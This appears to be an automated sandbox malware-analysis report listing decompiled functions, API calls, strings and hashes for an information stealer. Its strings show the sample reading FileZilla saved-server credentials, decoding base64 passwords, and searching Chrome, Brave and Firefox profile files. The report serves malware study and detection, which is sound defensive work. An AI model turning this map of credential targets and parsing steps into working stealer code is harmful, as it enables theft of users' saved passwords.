                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 1006159827-1013718255
                                    • Opcode ID: 6d7fc0e4a7b05cc8a968dae2d7e2ad8055b8a1c9e31515a26fb5e6b49d9f5b05
                                    • Instruction ID: 137b5389b4dccef7e0b758902a9f9ffc0c785058eb021faf1adee89a58df013e
                                    • Opcode Fuzzy Hash: 6d7fc0e4a7b05cc8a968dae2d7e2ad8055b8a1c9e31515a26fb5e6b49d9f5b05
                                    • Instruction Fuzzy Hash: 5F621831911616ABCB25EBA8D849FAF7BB9FF44300F044229B815E7391DB34DD16CB91
                                    Function 008D6DE0 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D6E15
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008D6E48
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6E82
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6EA9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D6EB4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6EDD
                                    • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 008D6EF7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6F19
                                    • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 008D6F25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6F50
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6F80
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008D6FB5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D701D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D704D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 313953988-555421843
                                    • Opcode ID: fc763a38002ddb8e46c4dd20668e19b4640904018bef4756e776db8ef647f050
                                    • Instruction ID: f7890279c43ed6ce7cfba7bd38a34112d45db32463fd3d5368fb4a4240e258dc
                                    • Opcode Fuzzy Hash: fc763a38002ddb8e46c4dd20668e19b4640904018bef4756e776db8ef647f050
                                    • Instruction Fuzzy Hash: 90424871A05616ABCB10ABB8DC49F6F7BB9FF44700F140629B905E6391EF34D906CBA1
                                    Function 008C6000 Relevance: 125.1, APIs: 66, Strings: 5, Instructions: 819stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C602F
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6082
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C60B5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C60E5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6120
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6153
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008C6163
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$XS$hS$pS
                                    • API String ID: 2041821634-4215072050
                                    • Opcode ID: ebb27a9754f97a6ee5263a34caac3e74ff319dc4da0b155d36a78af514a3680f
                                    • Instruction ID: c052a64d109c78fa2ea3bae8421da36efd3813b6435db189944d8b902a3286e0
                                    • Opcode Fuzzy Hash: ebb27a9754f97a6ee5263a34caac3e74ff319dc4da0b155d36a78af514a3680f
                                    • Instruction Fuzzy Hash: F852E7719016169BDB20EBB8DC49FAE7BB9FF44300F144128B905E7291EB34ED16CBA1
                                    Function 008D6FF9 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7290 8d6ff9 7291 8d7000-8d7008 7290->7291 7291->7291 7292 8d700a-8d7015 call 8c2840 7291->7292 7295 8d7017-8d701d lstrcpy 7292->7295 7296 8d7023-8d702b 7292->7296 7295->7296 7297 8d702d 7296->7297 7298 8d703a-8d7045 call 8c2840 7296->7298 7299 8d7030-8d7038 7297->7299 7302 8d7047-8d704d lstrcpy 7298->7302 7303 8d7053-8d705b 7298->7303 7299->7298 7299->7299 7302->7303 7304 8d705d 7303->7304 7305 8d706a-8d7075 call 8c2840 7303->7305 7306 8d7060-8d7068 7304->7306 7309 8d7077-8d707d lstrcpy 7305->7309 7310 8d7083-8d708b 7305->7310 7306->7305 7306->7306 7309->7310 7311 8d708d 7310->7311 7312 8d709a-8d70a7 call 8c2840 7310->7312 7313 8d7090-8d7098 7311->7313 7316 8d70a9-8d70af lstrcpy 7312->7316 7317 8d70b5-8d70ce GetProcessHeap RtlAllocateHeap 7312->7317 7313->7312 7313->7313 7316->7317 7318 8d70d4-8d70e2 StrStrA 7317->7318 7319 8d75f0-8d761a lstrlen call 8c2840 7317->7319 7320 8d715c-8d716a StrStrA 7318->7320 7321 8d70e4-8d710e lstrlen 7318->7321 7329 8d761c-8d7621 7319->7329 7330 8d762b-8d76f0 call 8c1410 call 8def30 call 8c2930 * 18 7319->7330 7324 8d716c-8d7196 lstrlen 7320->7324 7325 8d71e4-8d71f2 StrStrA 7320->7325 7346 8d7117-8d7124 call 8c2840 7321->7346 7347 8d7110-8d7115 7321->7347 7349 8d719f-8d71ac call 8c2840 7324->7349 7350 8d7198-8d719d 7324->7350 7326 8d726c-8d727a StrStrA 7325->7326 7327 8d71f4-8d721e lstrlen 7325->7327 7333 8d73ea-8d73f7 lstrlen 7326->7333 7334 8d7280-8d72aa lstrlen 7326->7334 7357 8d7227-8d7234 call 8c2840 7327->7357 7358 8d7220-8d7225 7327->7358 7329->7330 7335 8d7623-8d7625 lstrcpy 7329->7335 7338 8d73fd-8d740a lstrlen 7333->7338 7339 8d75d0 7333->7339 7369 8d72ac 7334->7369 7370 8d72b7-8d72c5 call 8c2840 7334->7370 7335->7330 7338->7339 7344 8d7410-8d7420 lstrlen 7338->7344 7343 8d75d3-8d75ea 7339->7343 7343->7318 7343->7319 7344->7343 7353 8d7426-8d7430 lstrlen 7344->7353 7362 8d712e-8d7133 7346->7362 7363 8d7126-8d7128 lstrcpy 7346->7363 7347->7346 7347->7347 7374 8d71ae-8d71b0 lstrcpy 7349->7374 7375 8d71b6-8d71bb 7349->7375 7350->7349 7350->7350 7353->7343 7360 8d7436-8d750d lstrcat * 14 lstrlen 7353->7360 7387 8d723e-8d7243 7357->7387 7388 8d7236-8d7238 lstrcpy 7357->7388 7358->7357 7358->7358 7367 8d750f-8d7511 call 8c2930 7360->7367 7368 8d7516-8d7523 call 8c2840 7360->7368 7372 8d713a-8d7147 call 8c2840 7362->7372 7373 8d7135 call 8c2930 7362->7373 7363->7362 7367->7368 7389 8d7525-8d752b lstrcpy 7368->7389 7390 8d7531-8d7543 lstrlen 7368->7390 7378 8d72b0-8d72b5 7369->7378 7391 8d72cf-8d72d4 7370->7391 7392 8d72c7-8d72c9 lstrcpy 7370->7392 7404 8d7149-8d714b 7372->7404 7405 8d7155-8d7157 call 8c2930 7372->7405 7373->7372 7374->7375 7385 8d71bd call 8c2930 7375->7385 7386 8d71c2-8d71cf call 8c2840 7375->7386 7378->7370 7378->7378 7385->7386 7417 8d71dd-8d71df call 8c2930 7386->7417 7418 8d71d1-8d71d3 7386->7418 7397 8d724a-8d7257 call 8c2840 7387->7397 7398 8d7245 call 8c2930 7387->7398 7388->7387 7389->7390 7400 8d754a-8d7557 call 8c2840 7390->7400 7401 8d7545 call 8c2930 7390->7401 7402 8d72db-8d72e9 call 8c2840 7391->7402 7403 8d72d6 call 8c2930 7391->7403 7392->7391 7420 8d7259-8d725b 7397->7420 7421 8d7265-8d7267 call 8c2930 7397->7421 7398->7397 7428 8d7559-8d755f lstrcpy 7400->7428 7429 8d7565-8d7577 lstrlen 7400->7429 7401->7400 7430 8d72eb-8d72ed 7402->7430 7431 8d72f7-8d731c call 8c2930 CryptStringToBinaryA 7402->7431 7403->7402 7404->7405 7414 8d714d-8d714f lstrcpy 7404->7414 7405->7320 7414->7405 7417->7325 7418->7417 7425 8d71d5-8d71d7 lstrcpy 7418->7425 7420->7421 7426 8d725d-8d725f lstrcpy 7420->7426 7421->7326 7425->7417 7426->7421 7428->7429 7433 8d757e-8d758b call 8c2840 7429->7433 7434 8d7579 call 8c2930 7429->7434 7430->7431 7435 8d72ef-8d72f1 lstrcpy 7430->7435 7431->7333 7444 8d7322-8d7332 LocalAlloc 7431->7444 7446 8d758d-8d7593 lstrcpy 7433->7446 7447 8d7599-8d75a8 lstrlen 7433->7447 7434->7433 7435->7431 7444->7333 7448 8d7338-8d7351 CryptStringToBinaryA 7444->7448 7446->7447 7451 8d75aa-8d75ac call 8c2930 7447->7451 7452 8d75b1-8d75c0 call 8c2840 7447->7452 7449 8d735f-8d736e lstrlen 7448->7449 7450 8d7353-8d735a LocalFree 7448->7450 7454 8d7377-8d7383 call 8c2840 7449->7454 7455 8d7370-8d7372 call 8c2930 7449->7455 7450->7333 7451->7452 7452->7343 7465 8d75c2-8d75ce lstrcpy 7452->7465 7467 8d7385-8d738b lstrcpy 7454->7467 7468 8d7391-8d73a7 lstrlen call 8c2840 7454->7468 7455->7454 7465->7343 7467->7468 7474 8d73bd-8d73bf 7468->7474 7475 8d73a9-8d73ab 7468->7475 7478 8d73c8-8d73d5 call 8c2840 7474->7478 7479 8d73c1-8d73c3 call 8c2930 7474->7479 7477 8d73ad-8d73b7 lstrcpy lstrcat 7475->7477 7475->7478 7477->7474 7485 8d73d7-8d73d9 7478->7485 7486 8d73e3-8d73e5 call 8c2930 7478->7486 7479->7478 7485->7486 7488 8d73db-8d73dd lstrcpy 7485->7488 7486->7333 7488->7486
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D701D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D704D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D707D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D70AF
                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 008D70BC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008D70C3
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 008D70DA
                                    • lstrlen.KERNEL32(00000000), ref: 008D70E5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D7128
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D714F
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 008D7162
                                    • lstrlen.KERNEL32(00000000), ref: 008D716D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D71B0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D71D7
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 008D71EA
                                    • lstrlen.KERNEL32(00000000), ref: 008D71F5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D7238
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D725F
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008D7272
                                    • lstrlen.KERNEL32(00000000), ref: 008D7281
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D72C9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D72F1
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008D7314
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008D7328
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 008D7349
                                    • LocalFree.KERNEL32(00000000), ref: 008D7354
                                    • lstrlen.KERNEL32(?), ref: 008D73EE
                                    • lstrlen.KERNEL32(?), ref: 008D7401
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2641759534-2314656281
                                    • Opcode ID: 7c45aed7477f2fef922a0fd10c526b73de3e2a8c4e5057acc07cb6269e8d8929
                                    • Instruction ID: 26e1ffe664f0b794c8d877d0f7bf5f056de1683bea705528325c3bc0a73d924d
                                    • Opcode Fuzzy Hash: 7c45aed7477f2fef922a0fd10c526b73de3e2a8c4e5057acc07cb6269e8d8929
                                    • Instruction Fuzzy Hash: C6023571A05616AFCB10ABB89C49F6E7BB9FF44700F140629B905E7391EF38D906C7A1
                                    Function 008CDD70 Relevance: 92.3, APIs: 48, Strings: 4, Instructions: 1264stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CDDC3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CDE0E
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CDE4F
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CDE7F
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008CDE90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindFirst
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 157892242-726946144
                                    • Opcode ID: a91249ded5ea8d7b51fd9560af283cb71b0d7678ebb60eeae4770273e5baacbc
                                    • Instruction ID: 5db5857dffff2dc9c2cf0def037e5cfbd5d90e3805fe7b55f24480484ba4087c
                                    • Opcode Fuzzy Hash: a91249ded5ea8d7b51fd9560af283cb71b0d7678ebb60eeae4770273e5baacbc
                                    • Instruction Fuzzy Hash: 23B25C71A012158FCB64DFA9C885FAA7BB4FF44314F18816DE849EB291DB34EC46CB91
                                    Function 008D4EC0 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1096stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4F02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4F2B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4F39
                                    • lstrlen.KERNEL32(008F5270), ref: 008D4F44
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4F61
                                    • lstrcat.KERNEL32(00000000,008F5270), ref: 008D4F6D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4F9B
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D4FB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 2567437900-3783873740
                                    • Opcode ID: 1f1c96b21b7ee3631108c981cb95974dd5118b91b67f9255b4c60dfe2ae9c9f0
                                    • Instruction ID: c04d80cedabc94085b9a71eb39bec78b05656c57d67501b5cd35d8a1f43a0b1e
                                    • Opcode Fuzzy Hash: 1f1c96b21b7ee3631108c981cb95974dd5118b91b67f9255b4c60dfe2ae9c9f0
                                    • Instruction Fuzzy Hash: 58920970A01A018FDB24DF69D958B6ABBE5FF44714F18826FA849CB3A1DB31DC42CB51
                                    Function 008D15C0 Relevance: 62.0, APIs: 41, Instructions: 526stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1602
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1625
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1630
                                    • lstrlen.KERNEL32(008F5270), ref: 008D163B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1658
                                    • lstrcat.KERNEL32(00000000,008F5270), ref: 008D1664
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1692
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D16AC
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008D16CB
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008D16E3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1720
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1749
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1754
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D175F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D177C
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D1788
                                    • lstrlen.KERNEL32(?), ref: 008D1793
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D17B5
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D17C1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D17EE
                                    • StrCmpCA.SHLWAPI(?,0053CF68), ref: 008D1815
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1856
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D187F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D18B3
                                    • StrCmpCA.SHLWAPI(?,0053D970), ref: 008D18CE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D190F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1938
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D196C
                                    • StrCmpCA.SHLWAPI(?,0053CF50), ref: 008D1988
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D19B9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D19E2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1A0B
                                    • StrCmpCA.SHLWAPI(?,0053D190), ref: 008D1A37
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1A78
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1AA1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1AD5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1B24
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1B58
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1B93
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008D1BBB
                                    • FindClose.KERNEL32(00000000), ref: 008D1BCA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
